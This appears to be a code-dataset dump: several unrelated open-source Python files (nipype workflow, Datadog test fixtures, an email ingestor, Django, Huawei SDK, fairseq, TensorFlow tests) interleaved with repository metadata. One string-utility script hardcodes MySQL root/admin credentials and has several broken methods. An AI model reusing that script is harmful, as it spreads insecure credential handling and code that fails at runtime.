('lh_curv_pial', 'surf.@lh_curv_pial'),
('rh_curv_pial', 'surf.@rh_curv_pial'),
('lh_pial', 'surf.@lh_pial'),
('rh_pial', 'surf.@rh_pial'),
('lh_thickness_pial', 'surf.@lh_thickness_pial'),
('rh_thickness_pial', 'surf.@rh_thickness_pial'),
('lh_area_mid', 'surf.@lh_area_mid'),
('rh_area_mid', 'surf.@rh_area_mid'),
('lh_volume', 'surf.@lh_volume'),
('rh_volume', 'surf.@rh_volume'),
('lh_aparc_annot_ctab', 'label.@lh_aparc_annot_ctab'),
('rh_aparc_annot_ctab', 'label.@rh_aparc_annot_ctab'),
('lh_aparc_stats', 'stats.@lh_aparc_stats'),
('rh_aparc_stats', 'stats.@rh_aparc_stats'),
('lh_aparc_pial_stats', 'stats.@lh_aparc_pial_stats'),
('rh_aparc_pial_stats', 'stats.@rh_aparc_pial_stats'),
('lh_aparc_a2009s_annot', 'label.@lh_aparc_a2009s_annot'),
('rh_aparc_a2009s_annot', 'label.@rh_aparc_a2009s_annot'),
('lh_aparc_a2009s_annot_ctab',
'label.@lh_aparc_a2009s_annot_ctab'),
('rh_aparc_a2009s_annot_ctab',
'label.@rh_aparc_a2009s_annot_ctab'),
('lh_aparc_a2009s_annot_stats',
'stats.@lh_aparc_a2009s_annot_stats'),
('rh_aparc_a2009s_annot_stats',
'stats.@rh_aparc_a2009s_annot_stats'),
('lh_aparc_DKTatlas40_annot', 'label.@lh_aparc_DKTatlas40_annot'),
('rh_aparc_DKTatlas40_annot', 'label.@rh_aparc_DKTatlas40_annot'),
('lh_aparc_DKTatlas40_annot_ctab',
'label.@lh_aparc_DKTatlas40_annot_ctab'),
('rh_aparc_DKTatlas40_annot_ctab',
'label.@rh_aparc_DKTatlas40_annot_ctab'),
('lh_aparc_DKTatlas40_annot_stats',
'stats.@lh_aparc_DKTatlas40_annot_stats'),
('rh_aparc_DKTatlas40_annot_stats',
'stats.@rh_aparc_DKTatlas40_annot_stats'),
('lh_wg_pct_mgh', 'surf.@lh_wg_pct_mgh'),
('rh_wg_pct_mgh', 'surf.@rh_wg_pct_mgh'),
('lh_wg_pct_stats', 'stats.@lh_wg_pct_stats'),
('rh_wg_pct_stats', 'stats.@rh_wg_pct_stats'),
('lh_pctsurfcon_log', 'log.@lh_pctsurfcon_log'),
('rh_pctsurfcon_log', 'log.@rh_pctsurfcon_log'),
('lh_BAMaps_stats', 'stats.@lh_BAMaps_stats'),
('lh_color', 'label.@lh_color'),
('lh_thresh_BAMaps_stats', 'stats.@lh_thresh_BAMaps_stats'),
('lh_thresh_color', 'label.@lh_thresh_color'),
('rh_BAMaps_stats', 'stats.@rh_BAMaps_stats'),
('rh_color', 'label.@rh_color'),
('rh_thresh_BAMaps_stats', 'stats.@rh_thresh_BAMaps_stats'),
('rh_thresh_color', 'label.@rh_thresh_color'),
('lh_BAMaps_labels', 'label.@lh_BAMaps_labels'),
('lh_thresh_BAMaps_labels', 'label.@lh_thresh_BAMaps_labels'),
('rh_BAMaps_labels', 'label.@rh_BAMaps_labels'),
('rh_thresh_BAMaps_labels', 'label.@rh_thresh_BAMaps_labels'),
('lh_BAMaps_annotation', 'label.@lh_BAMaps_annotation'),
('lh_thresh_BAMaps_annotation',
'label.@lh_thresh_BAMaps_annotation'),
('rh_BAMaps_annotation', 'label.@rh_BAMaps_annotation'),
('rh_thresh_BAMaps_annotation',
'label.@rh_thresh_BAMaps_annotation'),
]),
])
def completemethod(datasinked_files, subject_id):
print("recon-all has finished executing for subject: {0}".format(
subject_id))
return subject_id
completion = pe.Node(
niu.Function(['datasinked_files', 'subject_id'], ['subject_id'],
completemethod),
name="Completion")
postds_outputspec = pe.Node(
niu.IdentityInterface(['subject_id']), name="postdatasink_outputspec")
reconall.connect(
[(datasink, completion, [('out_file', 'datasinked_files')]),
(inputspec, completion, [('subject_id', 'subject_id')]),
(completion, postds_outputspec, [('subject_id', 'subject_id')])])
return reconall
| true | true |
f7fa59dd551cd47423e0065e991b4f3d1b3d1bfd | 712 | py | Python | snmp/tests/conftest.py | andersenleo/integrations-core | e521b88e32820a286a70c7797a663d4f9ba41110 | [
"BSD-3-Clause"
] | 2 | 2019-05-28T03:48:29.000Z | 2019-07-05T07:05:58.000Z | snmp/tests/conftest.py | andersenleo/integrations-core | e521b88e32820a286a70c7797a663d4f9ba41110 | [
"BSD-3-Clause"
] | 4 | 2019-07-03T02:53:19.000Z | 2019-07-10T14:52:14.000Z | snmp/tests/conftest.py | andersenleo/integrations-core | e521b88e32820a286a70c7797a663d4f9ba41110 | [
"BSD-3-Clause"
] | 1 | 2020-01-15T16:58:51.000Z | 2020-01-15T16:58:51.000Z | # (C) Datadog, Inc. 2018
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import os
import pytest
from datadog_checks.dev import docker_run
from datadog_checks.snmp import SnmpCheck
from .common import COMPOSE_DIR, SCALAR_OBJECTS, SCALAR_OBJECTS_WITH_TAGS, TABULAR_OBJECTS, generate_instance_config
@pytest.fixture(scope='session')
def dd_environment():
env = {'COMPOSE_DIR': COMPOSE_DIR}
with docker_run(os.path.join(COMPOSE_DIR, 'docker-compose.yaml'), env_vars=env, log_patterns="Listening at"):
yield generate_instance_config(SCALAR_OBJECTS + SCALAR_OBJECTS_WITH_TAGS + TABULAR_OBJECTS)
@pytest.fixture
def check():
return SnmpCheck('snmp', {}, {}, {})
| 28.48 | 116 | 0.769663 |
import os
import pytest
from datadog_checks.dev import docker_run
from datadog_checks.snmp import SnmpCheck
from .common import COMPOSE_DIR, SCALAR_OBJECTS, SCALAR_OBJECTS_WITH_TAGS, TABULAR_OBJECTS, generate_instance_config
@pytest.fixture(scope='session')
def dd_environment():
env = {'COMPOSE_DIR': COMPOSE_DIR}
with docker_run(os.path.join(COMPOSE_DIR, 'docker-compose.yaml'), env_vars=env, log_patterns="Listening at"):
yield generate_instance_config(SCALAR_OBJECTS + SCALAR_OBJECTS_WITH_TAGS + TABULAR_OBJECTS)
@pytest.fixture
def check():
return SnmpCheck('snmp', {}, {}, {})
| true | true |
f7fa5a68d486a959e38f57337dcb4a5a4de51095 | 2,188 | py | Python | Z_ALL_FILE/Jy1/fnstr-checkpoint.py | omikabir/omEngin | b8c04a5c2c12ffc3d0b67c2ceba9e5741d3f9195 | [
"Apache-2.0"
] | null | null | null | Z_ALL_FILE/Jy1/fnstr-checkpoint.py | omikabir/omEngin | b8c04a5c2c12ffc3d0b67c2ceba9e5741d3f9195 | [
"Apache-2.0"
] | null | null | null | Z_ALL_FILE/Jy1/fnstr-checkpoint.py | omikabir/omEngin | b8c04a5c2c12ffc3d0b67c2ceba9e5741d3f9195 | [
"Apache-2.0"
] | 1 | 2021-04-29T21:46:02.000Z | 2021-04-29T21:46:02.000Z | #!/usr/bin/env python
# coding: utf-8
# In[38]:
import pandas as pd
import os
import numpy
import MySQLdb
conn= MySQLdb.connect("localhost","root","admin","omdb")
file = os.getcwd() + "\\" + "BK1.csv"
class omstring:
def __init__(self):
print('x')
def chk_rcut(self,txt,findchr):
x = txt.find(findchr)
ln = len(txt)
if x != -1:
return txt[x:ln]
else:
return '0'
def chk_lcut(self,txt,findchr):
x = txt.find(findchr)
if x != -1:
return txt[0:x]
else:
return '0'
def midcut(self,txt,fromindx,toindx):
return txt[fromindx : toindx]
def instr(self,txt,chkchr):
return txt.find(chkchr)
def instrrev(self,txt,chkchr):
return txt.rindex(chkchr)
def str_split(self,txt,splitby):
return txt.split(splitby)
def str_chrocc(self,txt,chrchk):
return txt.count(chrchk)
def str_trim(self,txt):
return txt.strip()
def instr_st_end(self,txt,chkstr,st,end):
return txt.find(chkstr, st, end)
def isall_digit(self,txt):
return txt.isdigit(self)
def isall_alphabet(self,text):
return txt.isalpha()
def isall_number(self,text):
return txt.isnumeric()
def str_tolower(self,text):
return txt.casefold()
def str_toupper(self,txt):
return txt.upper()
def str_chktype(self,txt):
return type(txt)
df_mysql = pd.read_sql("select * from sitedb",conn)
df_csv = pd.read_csv(file)
st = """Close Notification:*13 3G & 11 4G Sites in Barisal are gradually up*
Severity: C-3*FT: 14:36 to 14:47_26/04*RT: 18:31_26/04*DUR: 03:55*Link: SPZNR02-SPZNR04*
Cause: VLAN missmatched at SPZNR02 during TNR CRQ000000224351
(Slogan: NCCD Abis_oIP Project FE configure at VLAN Barishal zone)"""
y = omstring()
print(y.instr(st,'VLAN'))
# In[33]:
y.chk_rcut(st,"CRQ0")
# In[22]:
y.midcut(st,3,10)
# In[25]:
y.instr(st,'VLAN')
# In[42]:
y.instrrev(st,'VLAN')
# In[43]:
y.midcut(st,0,21)
# In[44]:
y.midcut(st,y.instr(st,'VLAN'),y.instrrev(st,'VLAN'))
# In[45]:
y.str_chktype(st)
# In[ ]:
| 18.542373 | 96 | 0.601463 |
import pandas as pd
import os
import numpy
import MySQLdb
conn= MySQLdb.connect("localhost","root","admin","omdb")
file = os.getcwd() + "\\" + "BK1.csv"
class omstring:
def __init__(self):
print('x')
def chk_rcut(self,txt,findchr):
x = txt.find(findchr)
ln = len(txt)
if x != -1:
return txt[x:ln]
else:
return '0'
def chk_lcut(self,txt,findchr):
x = txt.find(findchr)
if x != -1:
return txt[0:x]
else:
return '0'
def midcut(self,txt,fromindx,toindx):
return txt[fromindx : toindx]
def instr(self,txt,chkchr):
return txt.find(chkchr)
def instrrev(self,txt,chkchr):
return txt.rindex(chkchr)
def str_split(self,txt,splitby):
return txt.split(splitby)
def str_chrocc(self,txt,chrchk):
return txt.count(chrchk)
def str_trim(self,txt):
return txt.strip()
def instr_st_end(self,txt,chkstr,st,end):
return txt.find(chkstr, st, end)
def isall_digit(self,txt):
return txt.isdigit(self)
def isall_alphabet(self,text):
return txt.isalpha()
def isall_number(self,text):
return txt.isnumeric()
def str_tolower(self,text):
return txt.casefold()
def str_toupper(self,txt):
return txt.upper()
def str_chktype(self,txt):
return type(txt)
df_mysql = pd.read_sql("select * from sitedb",conn)
df_csv = pd.read_csv(file)
st = """Close Notification:*13 3G & 11 4G Sites in Barisal are gradually up*
Severity: C-3*FT: 14:36 to 14:47_26/04*RT: 18:31_26/04*DUR: 03:55*Link: SPZNR02-SPZNR04*
Cause: VLAN missmatched at SPZNR02 during TNR CRQ000000224351
(Slogan: NCCD Abis_oIP Project FE configure at VLAN Barishal zone)"""
y = omstring()
print(y.instr(st,'VLAN'))
y.chk_rcut(st,"CRQ0")
y.midcut(st,3,10)
y.instr(st,'VLAN')
y.instrrev(st,'VLAN')
y.midcut(st,0,21)
y.midcut(st,y.instr(st,'VLAN'),y.instrrev(st,'VLAN'))
y.str_chktype(st)
| true | true |
f7fa5a8644796b54aed45902658c76f0c6461e47 | 634 | py | Python | frontend/batterycycling/manage.py | atomisticnet/gibbsml | 43a0e176160b522208320754d07966c8ed9a54a2 | [
"MIT"
] | 5 | 2021-12-02T07:59:23.000Z | 2022-02-12T06:03:56.000Z | frontend/batterycycling/manage.py | atomisticnet/gibbsml | 43a0e176160b522208320754d07966c8ed9a54a2 | [
"MIT"
] | null | null | null | frontend/batterycycling/manage.py | atomisticnet/gibbsml | 43a0e176160b522208320754d07966c8ed9a54a2 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'batterycycling.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| 28.818182 | 78 | 0.68612 |
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'batterycycling.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| true | true |
f7fa5b17bcc2bc7d454ac4089c0cb6c4f4eac213 | 3,205 | py | Python | huaweicloud-sdk-vpc/huaweicloudsdkvpc/v2/model/create_privateip_response.py | huaweicloud/huaweicloud-sdk-python-v3 | 7a6270390fcbf192b3882bf763e7016e6026ef78 | [
"Apache-2.0"
] | 64 | 2020-06-12T07:05:07.000Z | 2022-03-30T03:32:50.000Z | huaweicloud-sdk-vpc/huaweicloudsdkvpc/v2/model/create_privateip_response.py | huaweicloud/huaweicloud-sdk-python-v3 | 7a6270390fcbf192b3882bf763e7016e6026ef78 | [
"Apache-2.0"
] | 11 | 2020-07-06T07:56:54.000Z | 2022-01-11T11:14:40.000Z | huaweicloud-sdk-vpc/huaweicloudsdkvpc/v2/model/create_privateip_response.py | huaweicloud/huaweicloud-sdk-python-v3 | 7a6270390fcbf192b3882bf763e7016e6026ef78 | [
"Apache-2.0"
] | 24 | 2020-06-08T11:42:13.000Z | 2022-03-04T06:44:08.000Z | # coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class CreatePrivateipResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'privateips': 'list[Privateip]'
}
attribute_map = {
'privateips': 'privateips'
}
def __init__(self, privateips=None):
"""CreatePrivateipResponse - a model defined in huaweicloud sdk"""
super(CreatePrivateipResponse, self).__init__()
self._privateips = None
self.discriminator = None
if privateips is not None:
self.privateips = privateips
@property
def privateips(self):
"""Gets the privateips of this CreatePrivateipResponse.
私有IP列表对象
:return: The privateips of this CreatePrivateipResponse.
:rtype: list[Privateip]
"""
return self._privateips
@privateips.setter
def privateips(self, privateips):
"""Sets the privateips of this CreatePrivateipResponse.
私有IP列表对象
:param privateips: The privateips of this CreatePrivateipResponse.
:type: list[Privateip]
"""
self._privateips = privateips
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, CreatePrivateipResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 27.869565 | 79 | 0.570047 |
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class CreatePrivateipResponse(SdkResponse):
sensitive_list = []
openapi_types = {
'privateips': 'list[Privateip]'
}
attribute_map = {
'privateips': 'privateips'
}
def __init__(self, privateips=None):
super(CreatePrivateipResponse, self).__init__()
self._privateips = None
self.discriminator = None
if privateips is not None:
self.privateips = privateips
@property
def privateips(self):
return self._privateips
@privateips.setter
def privateips(self, privateips):
self._privateips = privateips
def to_dict(self):
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, CreatePrivateipResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true | true |
f7fa5b44230f67e825a60b537683511b06137f6a | 2,330 | py | Python | ingestors/email/msg.py | simonwoerpel/ingest-file | 1ff68be0abb92e50bf726a1c8c1f8ff12d8b2fc0 | [
"MIT"
] | 23 | 2017-05-25T01:08:58.000Z | 2019-06-22T19:35:50.000Z | ingestors/email/msg.py | simonwoerpel/ingest-file | 1ff68be0abb92e50bf726a1c8c1f8ff12d8b2fc0 | [
"MIT"
] | 153 | 2020-10-07T13:42:08.000Z | 2022-03-18T08:11:37.000Z | ingestors/email/msg.py | simonwoerpel/ingest-file | 1ff68be0abb92e50bf726a1c8c1f8ff12d8b2fc0 | [
"MIT"
] | 9 | 2020-10-22T08:54:20.000Z | 2022-02-01T10:23:22.000Z | import email
import logging
from email.policy import default
from email.errors import MessageError
from pantomime import normalize_mimetype
from followthemoney import model
from ingestors.ingestor import Ingestor
from ingestors.support.email import EmailSupport
from ingestors.support.encoding import EncodingSupport
from ingestors.exc import ProcessingException
log = logging.getLogger(__name__)
class RFC822Ingestor(Ingestor, EmailSupport, EncodingSupport):
MIME_TYPES = ["multipart/mixed", "message/rfc822"]
BODY_HTML = "text/html"
BODY_PLAIN = "text/plain"
BODY_TYPES = [BODY_HTML, BODY_PLAIN]
EXTENSIONS = ["eml", "rfc822", "email", "msg"]
SCORE = 7
def decode_part(self, part):
charset = part.get_content_charset()
payload = part.get_payload(decode=True)
return self.decode_string(payload, charset)
def parse_part(self, entity, part):
if part.is_multipart():
return
mime_type = normalize_mimetype(part.get_content_type())
file_name = part.get_filename()
is_attachment = part.is_attachment()
is_attachment = is_attachment or file_name is not None
is_attachment = is_attachment or mime_type not in self.BODY_TYPES
if is_attachment:
payload = part.get_payload(decode=True)
self.ingest_attachment(entity, file_name, mime_type, payload)
elif self.BODY_HTML in mime_type:
payload = self.decode_part(part)
self.extract_html_content(entity, payload, extract_metadata=False)
elif self.BODY_PLAIN in mime_type:
entity.add("bodyText", self.decode_part(part))
else:
log.error("Dangling MIME fragment: %s", part)
def ingest_msg(self, entity, msg):
self.extract_msg_headers(entity, msg)
self.resolve_message_ids(entity)
for part in msg.walk():
self.parse_part(entity, part)
def ingest(self, file_path, entity):
entity.schema = model.get("Email")
try:
with open(file_path, "rb") as fh:
msg = email.message_from_binary_file(fh, policy=default)
except (MessageError, ValueError, IndexError) as err:
raise ProcessingException("Cannot parse email: %s" % err) from err
self.ingest_msg(entity, msg)
| 36.40625 | 78 | 0.68412 | import email
import logging
from email.policy import default
from email.errors import MessageError
from pantomime import normalize_mimetype
from followthemoney import model
from ingestors.ingestor import Ingestor
from ingestors.support.email import EmailSupport
from ingestors.support.encoding import EncodingSupport
from ingestors.exc import ProcessingException
log = logging.getLogger(__name__)
class RFC822Ingestor(Ingestor, EmailSupport, EncodingSupport):
MIME_TYPES = ["multipart/mixed", "message/rfc822"]
BODY_HTML = "text/html"
BODY_PLAIN = "text/plain"
BODY_TYPES = [BODY_HTML, BODY_PLAIN]
EXTENSIONS = ["eml", "rfc822", "email", "msg"]
SCORE = 7
def decode_part(self, part):
charset = part.get_content_charset()
payload = part.get_payload(decode=True)
return self.decode_string(payload, charset)
def parse_part(self, entity, part):
if part.is_multipart():
return
mime_type = normalize_mimetype(part.get_content_type())
file_name = part.get_filename()
is_attachment = part.is_attachment()
is_attachment = is_attachment or file_name is not None
is_attachment = is_attachment or mime_type not in self.BODY_TYPES
if is_attachment:
payload = part.get_payload(decode=True)
self.ingest_attachment(entity, file_name, mime_type, payload)
elif self.BODY_HTML in mime_type:
payload = self.decode_part(part)
self.extract_html_content(entity, payload, extract_metadata=False)
elif self.BODY_PLAIN in mime_type:
entity.add("bodyText", self.decode_part(part))
else:
log.error("Dangling MIME fragment: %s", part)
def ingest_msg(self, entity, msg):
self.extract_msg_headers(entity, msg)
self.resolve_message_ids(entity)
for part in msg.walk():
self.parse_part(entity, part)
def ingest(self, file_path, entity):
entity.schema = model.get("Email")
try:
with open(file_path, "rb") as fh:
msg = email.message_from_binary_file(fh, policy=default)
except (MessageError, ValueError, IndexError) as err:
raise ProcessingException("Cannot parse email: %s" % err) from err
self.ingest_msg(entity, msg)
| true | true |
f7fa5b4de84cf3770e571b0a5aafd8c69e34588c | 3,268 | py | Python | validate.py | ggzhang0071/Self-Supervised-Embedding-Fusion-Transformer | 91ad5276bf9a796b93a9f8f2200ce75747725fed | [
"MIT"
] | 45 | 2020-09-30T23:09:40.000Z | 2022-03-01T08:31:56.000Z | validate.py | ggzhang0071/Self-Supervised-Embedding-Fusion-Transformer | 91ad5276bf9a796b93a9f8f2200ce75747725fed | [
"MIT"
] | 8 | 2020-11-05T04:44:21.000Z | 2021-12-20T03:26:59.000Z | validate.py | ggzhang0071/Self-Supervised-Embedding-Fusion-Transformer | 91ad5276bf9a796b93a9f8f2200ce75747725fed | [
"MIT"
] | 10 | 2020-10-04T17:25:27.000Z | 2021-12-23T02:40:28.000Z | #!/usr/bin/env python3 -u
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the LICENSE file in
# the root directory of this source tree. An additional grant of patent rights
# can be found in the PATENTS file in the same directory.
import torch
from fairseq import checkpoint_utils, options, progress_bar, utils
def main(args, override_args=None):
utils.import_user_module(args)
use_fp16 = args.fp16
use_cuda = torch.cuda.is_available() and not args.cpu
if override_args is not None:
overrides = vars(override_args)
overrides.update(eval(getattr(override_args, 'model_overrides', '{}')))
else:
overrides = None
# Load ensemble
print('| loading model(s) from {}'.format(args.path))
models, model_args, task = checkpoint_utils.load_model_ensemble_and_task(
[args.path],
arg_overrides=overrides,
)
model = models[0]
# Move models to GPU
for model in models:
if use_fp16:
model.half()
if use_cuda:
model.cuda()
# Print args
print(model_args)
# Build criterion
criterion = task.build_criterion(model_args)
criterion.eval()
# Load valid dataset (we load training data below, based on the latest checkpoint)
for subset in args.valid_subset.split(','):
try:
task.load_dataset(subset, combine=False, epoch=0)
dataset = task.dataset(subset)
except KeyError:
raise Exception('Cannot find dataset: ' + subset)
# Initialize data iterator
itr = task.get_batch_iterator(
dataset=dataset,
max_tokens=args.max_tokens,
max_sentences=args.max_sentences,
max_positions=utils.resolve_max_positions(
task.max_positions(),
*[m.max_positions() for m in models],
),
ignore_invalid_inputs=args.skip_invalid_size_inputs_valid_test,
required_batch_size_multiple=args.required_batch_size_multiple,
seed=args.seed,
num_workers=args.num_workers,
).next_epoch_itr(shuffle=False)
progress = progress_bar.build_progress_bar(
args, itr,
prefix='valid on \'{}\' subset'.format(subset),
no_progress_bar='simple'
)
log_outputs = []
for i, sample in enumerate(progress):
sample = utils.move_to_cuda(sample) if use_cuda else sample
_loss, _sample_size, log_output = task.valid_step(sample, model, criterion)
progress.log(log_output, step=i)
log_outputs.append(log_output)
log_output = task.aggregate_logging_outputs(log_outputs, criterion)
progress.print(log_output, tag=subset, step=i)
def cli_main():
parser = options.get_validation_parser()
args = options.parse_args_and_arch(parser)
# only override args that are explicitly given on the command line
override_parser = options.get_validation_parser()
override_args = options.parse_args_and_arch(override_parser, suppress_defaults=True)
main(args, override_args)
if __name__ == '__main__':
cli_main()
| 30.830189 | 88 | 0.655141 |
import torch
from fairseq import checkpoint_utils, options, progress_bar, utils
def main(args, override_args=None):
utils.import_user_module(args)
use_fp16 = args.fp16
use_cuda = torch.cuda.is_available() and not args.cpu
if override_args is not None:
overrides = vars(override_args)
overrides.update(eval(getattr(override_args, 'model_overrides', '{}')))
else:
overrides = None
print('| loading model(s) from {}'.format(args.path))
models, model_args, task = checkpoint_utils.load_model_ensemble_and_task(
[args.path],
arg_overrides=overrides,
)
model = models[0]
for model in models:
if use_fp16:
model.half()
if use_cuda:
model.cuda()
print(model_args)
criterion = task.build_criterion(model_args)
criterion.eval()
for subset in args.valid_subset.split(','):
try:
task.load_dataset(subset, combine=False, epoch=0)
dataset = task.dataset(subset)
except KeyError:
raise Exception('Cannot find dataset: ' + subset)
itr = task.get_batch_iterator(
dataset=dataset,
max_tokens=args.max_tokens,
max_sentences=args.max_sentences,
max_positions=utils.resolve_max_positions(
task.max_positions(),
*[m.max_positions() for m in models],
),
ignore_invalid_inputs=args.skip_invalid_size_inputs_valid_test,
required_batch_size_multiple=args.required_batch_size_multiple,
seed=args.seed,
num_workers=args.num_workers,
).next_epoch_itr(shuffle=False)
progress = progress_bar.build_progress_bar(
args, itr,
prefix='valid on \'{}\' subset'.format(subset),
no_progress_bar='simple'
)
log_outputs = []
for i, sample in enumerate(progress):
sample = utils.move_to_cuda(sample) if use_cuda else sample
_loss, _sample_size, log_output = task.valid_step(sample, model, criterion)
progress.log(log_output, step=i)
log_outputs.append(log_output)
log_output = task.aggregate_logging_outputs(log_outputs, criterion)
progress.print(log_output, tag=subset, step=i)
def cli_main():
parser = options.get_validation_parser()
args = options.parse_args_and_arch(parser)
override_parser = options.get_validation_parser()
override_args = options.parse_args_and_arch(override_parser, suppress_defaults=True)
main(args, override_args)
if __name__ == '__main__':
cli_main()
| true | true |
f7fa5ba72903d65c6cf4f6c5af2e049b382a1af6 | 818 | py | Python | webapp/roasterui/urls.py | markturansky/coffeeroaster | 238217ce4abbd2f18383ba4811f4cca14ee0fb8f | [
"MIT"
] | null | null | null | webapp/roasterui/urls.py | markturansky/coffeeroaster | 238217ce4abbd2f18383ba4811f4cca14ee0fb8f | [
"MIT"
] | null | null | null | webapp/roasterui/urls.py | markturansky/coffeeroaster | 238217ce4abbd2f18383ba4811f4cca14ee0fb8f | [
"MIT"
] | null | null | null | """webapp URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^roasts/', include('roasts.urls')),
]
| 35.565217 | 79 | 0.698044 | from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^roasts/', include('roasts.urls')),
]
| true | true |
f7fa5d25c543d762ee653ca2780563f3feaa3132 | 2,248 | py | Python | research2018/test/tabular_cfr_test.py | dmorrill10/research2018 | 3604e3fb774f6d882e41cc217ceb85038d3775e5 | [
"MIT"
] | null | null | null | research2018/test/tabular_cfr_test.py | dmorrill10/research2018 | 3604e3fb774f6d882e41cc217ceb85038d3775e5 | [
"MIT"
] | null | null | null | research2018/test/tabular_cfr_test.py | dmorrill10/research2018 | 3604e3fb774f6d882e41cc217ceb85038d3775e5 | [
"MIT"
] | null | null | null | import tensorflow as tf
tf.compat.v1.enable_eager_execution()
from research2018.tabular_cfr import TabularCfr, TabularCfrCurrent
class TabularCfrTest(tf.test.TestCase):
def setUp(self):
tf.random.set_seed(42)
def test_zeros(self):
num_info_sets = 2
num_actions = 3
patient = TabularCfr.zeros(num_info_sets, num_actions)
self.assertAllClose(
tf.fill([num_info_sets, num_actions], 1.0 / num_actions),
patient.cur())
self.assertAllClose(
tf.fill([num_info_sets, num_actions], 1.0 / num_actions),
patient.avg())
self.assertAllClose(
tf.fill([num_info_sets, num_actions], 1.0 / num_actions),
patient.policy())
def test_update(self):
num_info_sets = 2
num_actions = 3
patient = TabularCfr(
TabularCfrCurrent(
tf.random.normal(shape=[num_info_sets, num_actions])),
tf.zeros([num_info_sets, num_actions]))
initial_cur = tf.constant([[0.50621, 0., 0.49379],
[0.333333, 0.333333, 0.333333]])
self.assertAllClose(initial_cur, patient.cur())
self.assertAllClose(
tf.fill([num_info_sets, num_actions], 1.0 / num_actions),
patient.avg())
self.assertAllClose(
tf.fill([num_info_sets, num_actions], 1.0 / num_actions),
patient.policy())
def env(policy):
return tf.random.normal(
shape=[num_info_sets, num_actions]) * policy
patient.update(env)
next_cur = tf.constant([[0.39514, 0., 0.60486],
[0.333333, 0.333333, 0.333333]])
self.assertAllClose(next_cur, patient.cur())
self.assertAllClose(initial_cur, patient.avg())
self.assertAllClose(initial_cur, patient.policy())
patient.update(env)
next_next_cur = [[0., 0., 1.], [0.333333, 0.333333, 0.333333]]
self.assertAllClose(next_next_cur, patient.cur())
self.assertAllClose((initial_cur + next_cur) / 2.0, patient.avg())
self.assertAllClose((initial_cur + next_cur) / 2.0, patient.policy())
if __name__ == '__main__':
tf.test.main()
| 35.125 | 77 | 0.598754 | import tensorflow as tf
tf.compat.v1.enable_eager_execution()
from research2018.tabular_cfr import TabularCfr, TabularCfrCurrent
class TabularCfrTest(tf.test.TestCase):
def setUp(self):
tf.random.set_seed(42)
def test_zeros(self):
num_info_sets = 2
num_actions = 3
patient = TabularCfr.zeros(num_info_sets, num_actions)
self.assertAllClose(
tf.fill([num_info_sets, num_actions], 1.0 / num_actions),
patient.cur())
self.assertAllClose(
tf.fill([num_info_sets, num_actions], 1.0 / num_actions),
patient.avg())
self.assertAllClose(
tf.fill([num_info_sets, num_actions], 1.0 / num_actions),
patient.policy())
def test_update(self):
num_info_sets = 2
num_actions = 3
patient = TabularCfr(
TabularCfrCurrent(
tf.random.normal(shape=[num_info_sets, num_actions])),
